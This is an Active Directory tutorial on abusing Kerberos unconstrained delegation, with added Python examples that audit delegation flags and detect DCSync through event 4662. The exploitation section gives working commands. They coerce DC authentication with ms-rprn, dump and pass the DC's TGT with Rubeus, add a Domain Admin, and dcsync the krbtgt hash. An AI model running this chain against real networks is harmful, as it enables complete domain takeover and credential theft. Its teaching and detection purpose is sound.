Unconstrained Delegation
A computer with unconstrained delegation is trusted to delegate to any service: when a user authenticates to it over Kerberos, a copy of the user's TGT travels with the service ticket and is cached in the computer's memory, where anyone with local admin can extract it.
Enumeration
Here we assume we have a high-integrity grunt in Covenant on a computer that has unconstrained delegation. We can check this with the following command:
powershell get-netcomputer -unconstrained -properties dnshostname
Here is what the result looks like; WORKSTATION-01 is the host with unconstrained delegation (DC01 shows up as well because domain controllers have this flag by default):
dnshostname
-----------
DC01.domain.local
WORKSTATION-01.domain.local
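The same check, done from the defender's side, as an added example (not code from the original notes): decode the userAccountControl bit flags from an LDAP or AD-module export, separate the domain controllers (unconstrained by design) from the hosts that should not be, and list the privileged accounts that are still delegable, i.e. whose TGT would be cached on such a host. The records, names and the is_privileged marker are constructed to mirror the output above; the flag values and the bitwise-AND matching rule OID are the documented Microsoft ones.

```python
# Added audit example (not from the original notes): decode userAccountControl
# bit flags to find unconstrained-delegation hosts and privileged accounts that
# can still be delegated. The records are constructed to mirror the page's
# DC01 / WORKSTATION-01 output; in practice they come from an LDAP export.

# userAccountControl flags (Microsoft ADS_USER_FLAG_ENUM values)
NORMAL_ACCOUNT = 0x200
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000        # domain controller machine account
DONT_EXPIRE_PASSWORD = 0x10000
TRUSTED_FOR_DELEGATION = 0x80000     # unconstrained delegation
NOT_DELEGATED = 0x100000             # "Account is sensitive and cannot be delegated"

# LDAP matching-rule OID for bitwise AND, usable in LDAP/ADSI filters
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"

# Constructed sample: (sAMAccountName, userAccountControl, is_privileged)
SAMPLE = [
    ("DC01$", SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION, False),   # expected for a DC
    ("WORKSTATION-01$", WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION, False),
    ("FILE01$", WORKSTATION_TRUST_ACCOUNT, False),
    ("administrator", NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD, True),     # still delegable
    ("svc_backup", NORMAL_ACCOUNT | NOT_DELEGATED, True),               # protected
]


def uac_filter(flag):
    """Build the LDAP filter clause that matches accounts with `flag` set."""
    return f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={flag})"


def unconstrained_hosts(records, include_dcs=False):
    """Names of accounts with TRUSTED_FOR_DELEGATION set.

    Domain controllers are unconstrained by design, so they are left out
    unless include_dcs is True; the interesting finds are the non-DC hosts.
    """
    found = []
    for name, uac, _ in records:
        if not uac & TRUSTED_FOR_DELEGATION:
            continue
        if uac & SERVER_TRUST_ACCOUNT and not include_dcs:
            continue
        found.append(name)
    return found


def unprotected_privileged(records):
    """Privileged accounts lacking NOT_DELEGATED: if one of them authenticates
    to an unconstrained host, its TGT is cached there and can be extracted."""
    return [name for name, uac, priv in records if priv and not uac & NOT_DELEGATED]


if __name__ == "__main__":
    print("LDAP filter:", uac_filter(TRUSTED_FOR_DELEGATION))
    print("Unconstrained non-DC hosts:", unconstrained_hosts(SAMPLE))
    print("Privileged accounts still delegable:", unprotected_privileged(SAMPLE))
```

Every host the first list returns is a candidate for removing TRUSTED_FOR_DELEGATION (or moving it to resource-based constrained delegation if delegation is really required); every account the second list returns is a candidate for NOT_DELEGATED or membership in Protected Users, which stops its TGT from being delegated at all.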
Exploitation
We upload ms-rprn.exe to our target with the Covenant upload command, then run it:
shell ms-rprn.exe \\dc01 \\workstation-01
Then run Rubeus to dump the TGT that DC01 left in memory:
rubeus dump /service:krbtgt
Here we will want to copy the Base64EncodedTicket of DC01 and keep it aside. Then we create a new logon session to hold the ticket (the password is not checked, so any string works):
maketoken administrator domain type-any-string-here
rubeus ptt /ticket:PASTE-HERE-DC01-Base64EncodedTicket
We should now be able to create a new user and add it to the Domain Admins:
shell net user user SafePass1! /add /domain
shell net group "Domain Admins" user /add /domain
dcsync domain\krbtgt
We will need the krbtgt hash this returns if we want to forge a golden ticket.
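The dcsync step above is the loudest part of the chain from a monitoring point of view, because the DC logs a Security event 4662 when a principal exercises the replication control-access rights on the domain object. As an added detection example (not part of the original notes), this script flags 4662 events in which the subject is not a domain controller machine account yet holds DS-Replication-Get-Changes / DS-Replication-Get-Changes-All. The events are constructed and flattened to one key=value;key=value line each, and the DC_ACCOUNTS allow-list is an assumption; the two replication GUIDs are the real ones.

```python
# Added detection example (not from the original notes): flag DCSync-style
# replication by a principal that is not a domain controller, using Windows
# Security event 4662. The events are constructed, flattened to one
# "key=value;key=value" line each; real ones come from the Security log.
import re

# Control-access-right GUIDs that DCSync exercises on the domain object
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}

# Accounts expected to replicate (DC machine accounts, assumed names); extend
# this allow-list with legitimate sync accounts such as Azure AD Connect.
DC_ACCOUNTS = {"DC01$", "DC02$"}

SAMPLE_4662 = [
    # normal DC-to-DC replication
    "EventID=4662;SubjectUserName=DC02$;SubjectDomainName=DOMAIN;"
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    # the page's "dcsync domain\krbtgt" step, as seen by the DC
    "EventID=4662;SubjectUserName=user;SubjectDomainName=DOMAIN;"
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    # ordinary directory access by the same user (user object class GUID), not replication
    "EventID=4662;SubjectUserName=user;SubjectDomainName=DOMAIN;"
    "Properties={bf967aba-0de6-11d0-a285-00aa003049e2}",
    # unrelated event type
    "EventID=4624;SubjectUserName=user;SubjectDomainName=DOMAIN;Properties=",
]

GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")


def parse_event(line):
    """Split a constructed key=value;key=value line into a dict."""
    return dict(part.split("=", 1) for part in line.split(";"))


def replication_rights(event):
    """Names of replication rights present in the event's Properties field."""
    guids = GUID_RE.findall(event.get("Properties", ""))
    return [REPLICATION_RIGHTS[g.lower()] for g in guids if g.lower() in REPLICATION_RIGHTS]


def find_dcsync(lines, dc_accounts=DC_ACCOUNTS):
    """Return (subject, rights) for 4662 events where a non-DC principal
    exercised replication rights; each hit is a DCSync candidate."""
    allowed = {a.upper() for a in dc_accounts}
    hits = []
    for line in lines:
        event = parse_event(line)
        if event.get("EventID") != "4662":
            continue
        rights = replication_rights(event)
        if rights and event["SubjectUserName"].upper() not in allowed:
            hits.append((event["SubjectUserName"], rights))
    return hits


if __name__ == "__main__":
    for subject, rights in find_dcsync(SAMPLE_4662):
        print(f"DCSync candidate: {subject} used {', '.join(rights)}")
```

Event 4662 is only written when the "Audit Directory Service Access" subcategory is enabled and the domain object carries a SACL auditing those rights, so check both before relying on this; the earlier steps (the coerced authentication from DC01 and the new Domain Admin added with net group) leave their own trail in 4624/4728-type events, but the replication rights are the narrowest signal for this chain.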